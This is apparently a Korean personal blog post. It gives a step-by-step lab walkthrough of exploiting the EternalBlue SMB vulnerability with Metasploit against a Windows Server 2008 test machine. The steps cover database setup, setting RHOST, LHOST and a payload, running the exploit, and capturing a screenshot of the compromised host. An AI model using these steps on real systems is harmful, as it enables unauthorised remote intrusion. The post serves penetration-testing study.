끄적끄적 아무기록

이터널블루 취약점 공격

by 현생사는갓생지망생
반응형

EternalBlue 취약점 공격

 

EternalBlue 란?

미국 국가안보국(NSA)에서 개발된 것으로 간주되는 취약점 프로그램.

 

메타스플로잇 이란?

대표적인 모의 해킹 프로그램.

가장 먼저 실행시켜줘야 할 명령어는

service postgresql start !!

실행하면 몇 초가 지난 후 프롬프트가 떨어지는데,

Metasploit 동작을 원활하게 수행하기 위한 DB서비스 실행 명령어이다.

 

msfdb init

서비스를 시작한 DB를 초기화시키는 작업으로, 최초 1번만 해주면 된다.

 

msfconsole

Metasploit 실행 !!

 

db_rebuild_cache

명령어는 백그라운드에서 캐시 값을 DB에 계속해서 저장시키는 명령어인데,

검색 속도가 조금 빨라지는 장점이 있다.

 

search 명령어로 취약점을 찾아보자.

 

찾은 취약점을 사용할 수 있도록 use !

 

가장 중요한 것은 아무래도 확인 과정이다.

명령어를 하나 입력할 때마다 show options 로 확인하는 습관을 들이자.

 

Current Setting 부분은 빈칸으로 두면 안 된다.

Required가 no인 부분 제외,

빈칸인 부분은 RHOST뿐이다.

 

set rhost [공격할 PC의 IP]

 

show targets 확인.

 

set payload ~

명령어는 공격 후 어떤 행위를 할 것인지 지정해주는 명령어이다.

 

show options으로 확인을 해주면 LHOST 부분이 빈칸인 것 확인 가능.

 

set lhost [내 PC의 IP]

 

여기까지 설정이 끝났다면 공격! run !! (또는 exploit)

 

만약 위의 과정을 모두 했는데 [-] 이러한 표시로 에러가 나면서

공격이 먹히지 않는다면

공격할 PC의 방화벽이 막고있는 것이다.

공격할 PC로 가서 방화벽을 열어주자.

 

135, 139, 445번 포트 열어주기.

 

성공적으로 공격이 먹혔다면?

screenshot 명령어를 통해 잘 되었는지 확인을 해보자.

/root/qkGPAgnT.jpeg 경로에 저장이 되었다는 것을 알 수 있다.

 

홈 >

w2k8-1을 공격했으므로

w2k8-1의 현재 화면이 그대로 스크린샷 찍혀 저장돼있다.

반응형

블로그의 정보

현생이네

현생사는갓생지망생

활동하기